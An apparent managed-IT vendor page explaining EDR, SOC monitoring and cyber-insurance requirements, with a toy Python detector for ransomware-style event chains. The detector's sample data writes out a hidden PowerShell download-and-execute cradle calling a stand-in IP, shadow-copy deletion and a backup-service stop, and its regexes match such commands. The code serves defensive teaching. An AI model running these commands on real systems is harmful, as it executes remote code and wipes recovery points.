The short version
EDR — endpoint detection and response — is the security category that replaced "antivirus" for businesses. Antivirus matched files against a signature list of known-bad malware. EDR watches what programs do on the endpoint — processes, files, network calls, registry edits, command-line behavior — and detects the patterns that real attacks use, even when the attacker is using legitimate built-in Windows or macOS tools (called living-off-the-land).
On top of detection, EDR provides response: it can isolate a compromised device from the network, kill a malicious process, quarantine a file, and (in many products) roll back ransomware changes. Modern managed EDR is paired with a 24/7 Security Operations Center (SOC) — humans who triage the alerts so the business owner isn't getting paged at 9 PM about a false positive.
Why antivirus stopped being enough
Three things changed:
- Attackers stopped using detectable malware. Modern ransomware groups frequently get in through phishing, then use the built-in tools (PowerShell, PsExec, WMI, RDP) to move around. Nothing for signature antivirus to flag.
- Attackers got faster. The average time from initial compromise to ransomware encryption is now measured in hours, not days. Signature antivirus relies on a vendor seeing a sample, writing a signature, and pushing it. Too slow for a sub-day attack.
- Attackers got patient when patience pays. Some groups dwell for weeks before encrypting, exfiltrating data and mapping the network in the meantime. Behavioral detection can catch that dwell-time activity (discovery, credential access, staging of data for exfiltration); signature antivirus cannot, because none of it involves a known-bad file.
What EDR detects that antivirus doesn't
- Living-off-the-land — PowerShell scripts pulling code from remote URLs, PsExec running on a non-IT machine, wmic.exe spawning processes on remote hosts.
- Credential theft — Mimikatz-class behavior, LSASS memory reads, Kerberos ticket abuse.
- Lateral movement — unusual RDP sessions, SMB write patterns, scheduled-task creation on remote machines.
- Ransomware staging — mass file enumeration, shadow-copy deletion, backup-service termination.
- Persistence — unusual registry Run keys, scheduled tasks, services, WMI subscriptions.
Each of these patterns is normal in a single isolated case (admins use PowerShell; backup software deletes shadow copies). What EDR catches is the sequence: PowerShell pulling from a suspicious URL, then enumerating files, then deleting shadow copies, then killing the backup service — on an endpoint that's never done any of that before.
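To make the "sequence, not single event" point concrete, here is a toy correlator, added as an illustration and not code from this page or from any EDR product. The log events, host names, thresholds, regexes and the per-host baseline table are all constructed for the example (the field names only loosely resemble Sysmon process-creation events and are an assumption, not a vendor schema). It ignores any single stage on its own, baselines out stages that are routine for a given host (the backup server deleting shadow copies), and alerts only when several stages appear in order on one endpoint inside a time window.

```python
"""Toy behavioral correlation: alert on an ordered chain of stages on one host
within a window, ignore isolated stages, and baseline out stages that are
routine for a particular host. Events and tuning below are constructed for
this example; field names are an assumption, not any EDR vendor's schema."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=30)   # how close together the stages must be
ENUM_THRESHOLD = 50              # file reads inside WINDOW that count as mass enumeration
MIN_STAGES = 3                   # ordered stages needed before alerting

# Stages in the order an encryption run tends to go through them.
ORDER = ["download_cradle", "mass_enum", "shadow_delete", "backup_kill"]

# Command-line patterns for the process-creation stages (illustrative, not exhaustive).
STAGE_PATTERNS = {
    "download_cradle": re.compile(r"powershell.*(downloadstring|invoke-webrequest|net\.webclient)", re.I),
    "shadow_delete": re.compile(r"vssadmin.*delete\s+shadows|wmic.*shadowcopy.*delete", re.I),
    "backup_kill": re.compile(r"(net\s+stop|sc\s+stop|taskkill).*(backup|veeam|acronis)", re.I),
}

# Per-host tuning (assumed): the backup server deletes shadow copies and bounces
# the backup service every night, so those stages are normal there and never counted.
BASELINE = {"BACKUP01": {"shadow_delete", "backup_kill"}}


def classify(event):
    """Map one process-creation event to a stage name, or None."""
    if event["kind"] != "process":
        return None
    for stage, pattern in STAGE_PATTERNS.items():
        if pattern.search(event["cmdline"]):
            return stage
    return None


def correlate(events, window=WINDOW):
    """Return {host: [stages...]} for hosts showing >= MIN_STAGES stages, in ORDER, within window."""
    reads = defaultdict(list)      # host -> timestamps of file reads
    observed = defaultdict(list)   # host -> [(ts, stage)] in time order
    for ev in sorted(events, key=lambda e: e["ts"]):
        host = ev["host"]
        if ev["kind"] == "file_read":
            reads[host].append(ev["ts"])
            recent = [t for t in reads[host] if ev["ts"] - t <= window]
            if len(recent) == ENUM_THRESHOLD:   # fires once, when the threshold is crossed
                observed[host].append((ev["ts"], "mass_enum"))
            continue
        stage = classify(ev)
        if stage and stage not in BASELINE.get(host, set()):
            observed[host].append((ev["ts"], stage))

    alerts = {}
    for host, obs in observed.items():
        best = []
        for end_ts, _ in obs:                 # try each observation as the end of a window
            chain, last = [], -1
            for ts, stage in obs:
                if end_ts - window <= ts <= end_ts and ORDER.index(stage) > last:
                    chain.append(stage)
                    last = ORDER.index(stage)
            if len(chain) > len(best):
                best = chain
        if len(best) >= MIN_STAGES:
            alerts[host] = best
    return alerts


def _ts(hhmm):
    return datetime(2026, 3, 2, int(hhmm[:2]), int(hhmm[3:]))


# Constructed sample telemetry: one workstation running the full chain, the backup
# server doing its nightly routine, and an admin fetching a tool with PowerShell.
SAMPLE_EVENTS = (
    [{"ts": _ts("09:00"), "host": "WS-LAW-07", "kind": "process",
      "cmdline": 'powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(\'http://203.0.113.9/a.ps1\')"'}]
    + [{"ts": _ts("09:05") + timedelta(seconds=5 * i), "host": "WS-LAW-07", "kind": "file_read",
        "path": f"\\\\FS01\\Clients\\matter{i:03d}.docx"} for i in range(60)]
    + [{"ts": _ts("09:12"), "host": "WS-LAW-07", "kind": "process",
        "cmdline": "vssadmin.exe delete shadows /all /quiet"},
       {"ts": _ts("09:13"), "host": "WS-LAW-07", "kind": "process",
        "cmdline": 'net stop "Veeam Backup Service"'},
       {"ts": _ts("02:00"), "host": "BACKUP01", "kind": "process",
        "cmdline": "vssadmin.exe delete shadows /for=D: /oldest"},
       {"ts": _ts("02:01"), "host": "BACKUP01", "kind": "process",
        "cmdline": 'net stop "Veeam Backup Service"'},
       {"ts": _ts("10:30"), "host": "IT-ADMIN", "kind": "process",
        "cmdline": "powershell Invoke-WebRequest https://example.com/tool.zip -OutFile tool.zip"}]
)

if __name__ == "__main__":
    print(correlate(SAMPLE_EVENTS))
```

Run as-is, only WS-LAW-07 alerts, with all four stages in order; BACKUP01 produces no observations because its two stages are baselined, and IT-ADMIN's single download cradle never reaches MIN_STAGES. Real products do this with far richer telemetry and per-tenant tuning, which is the "policy baseline" step in the rollout section below.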
What "response" actually means
Detection alone is observation. Response is action. A managed EDR with SOC can:
- Isolate the endpoint — cut its network access, leaving only the EDR's secure channel. The attack stops moving while the rest of the business keeps running.
- Kill the malicious process — before encryption completes, before exfiltration completes.
- Quarantine the file — pull the dropper off disk and into a forensic store.
- Roll back ransomware changes — some EDR products keep their own journal of file changes (separate from Windows shadow copies, which ransomware deletes first, as noted above) and can restore files encrypted within a bounded window, on the order of an hour in some products.
- Provide the forensic record — cyber-insurance carriers and incident-response firms need the timeline. EDR keeps it.
Why 24/7 SOC matters
An EDR alert on its own is a notification, not a decision. Is this PowerShell script a legitimate admin task or a phishing payload? Is this RDP session the office manager logging in from her home laptop or a hands-on-keyboard attacker who stole her credentials?
A SOC answers those questions inside the same shift — usually within minutes — and takes the response action while the business owner is still on a call with a client. Without a SOC, the EDR sends emails to a distribution list that nobody reads at 10 PM, and the response window closes.
The combination — EDR plus 24/7 SOC — is what cyber-insurance carriers now ask about on the renewal application. "Do you have EDR?" is the question. "Do you have EDR with managed SOC monitoring?" is the better question.
What cyber insurance asks for
Carriers in 2026 typically require:
- EDR (not antivirus) on every endpoint — workstations, laptops, servers.
- 24/7 monitoring of EDR alerts (managed SOC or internal SOC, not "we'll check it Monday").
- Average time-to-isolate under a defined SLA (usually 15–30 minutes from alert).
- Forensic retention — enough log data to reconstruct an incident.
See "Cyber insurance is requiring MFA and EDR: what that means" for the full eleven-control list.
What an EDR rollout actually involves
For a small business moving off legacy antivirus to a managed EDR:
- Asset inventory — every workstation, laptop, server we want covered.
- Agent deployment — the EDR sensor installs in minutes per endpoint, no reboot required for most platforms.
- Policy baseline — the SOC tunes detection for the business's normal patterns (so the law firm's late-night PowerShell from one specific user isn't a 2 AM alert every night).
- Decommission the old antivirus — in a controlled order, so there's never a gap.
- Documented response runbook — who the SOC calls when, in what order, with what authority.
For a 25-person office, the rollout typically completes in 2–3 weeks of background work; users notice no change.
How a Micro-IT plan covers EDR
Every Micro-IT client environment ships with EDR on every endpoint as part of Managed Endpoint, paired with a 24/7 SOC monitoring all alerts. The SOC follows a documented incident-response runbook — isolate the endpoint within 90 seconds of detection, call the client within 15 minutes, restore from clean backups if needed. We have never paid a ransom, and we never will. See the Security page for the full eleven-vendor, seven-layer stack, or get a written quote with EDR included on every device.
